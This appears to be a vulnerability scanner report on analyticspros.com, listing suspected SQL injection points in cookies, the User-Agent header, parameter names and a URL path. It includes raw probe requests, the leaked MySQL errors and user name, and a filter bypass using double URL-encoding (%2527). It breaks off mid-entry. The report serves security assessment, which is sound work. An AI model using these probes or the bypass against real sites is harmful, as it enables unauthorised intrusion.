HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:51:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:51:05 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:51:05 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /products/65-ae/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products/65-ae/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0'; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 1
HTTP/1.1 404 Article #0 not found Date: Sat, 06 Nov 2010 04:35:30 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 04:35:33 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3017
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /products/65-ae/function.mysql-connect HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/products/65-ae/ Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 1ee73a388da0bb7ec3d7afe3beccac53=25b524d5f4fc269e9c37e5569ac51b00; ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; optimizelyEndUserId=oeu1288999536936r0.7062593474984169; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; apros2.0_tpl=apros2.0''; __utmc=26076141; __utmb=26076141.28.9.1288999622937; __utmmobile=0xade0ac5896f84b3c;
Response 2
HTTP/1.1 404 Not Found Date: Sat, 06 Nov 2010 04:35:34 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The optimizelyBuckets cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyBuckets cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyBuckets cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the fpssCookie cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:47:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true%2527%2527; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:47:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:47:25 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 07:47:25 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20579
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11'; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:32:03 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11''; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:32:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:32:07 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:32:08 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20578
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/123-dimensionator-install.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527 Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:09:58 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/123-dimensionator-install.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527 Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 301 Moved Permanently Date: Sat, 06 Nov 2010 08:10:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Location: http://www.analyticspros.com/index.php?option=com_user&view=login&return=aHR0cDovL3d3dy5hbmFseXRpY3Nwcm9zLmNvbS9yZXNvdXJjZXMvMTIzLWRpbWVuc2lvbmF0b3ItaW5zdGFsbC5odG1s Content-Length: 0 Connection: close Content-Type: text/html
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/123-dimensionator-install.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:35:24 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/123-dimensionator-install.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:35:25 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
1.239. http://www.analyticspros.com/resources/123-dimensionator-install.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/resources/123-dimensionator-install.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/123-dimensionator-install.html?1%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:09:10 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/123-dimensionator-install.html?1%2527%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=15 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2 (redirected)
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:09:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:09:14 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:09:15 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18609
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/64-campaign-tracker.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:06:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/64-campaign-tracker.html?itemid=70#comment HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/resources.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:06:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 08:06:34 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 08:06:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 20689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /resources'/90-analytics-toolbar.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 08:06:16 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 08:06:17 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
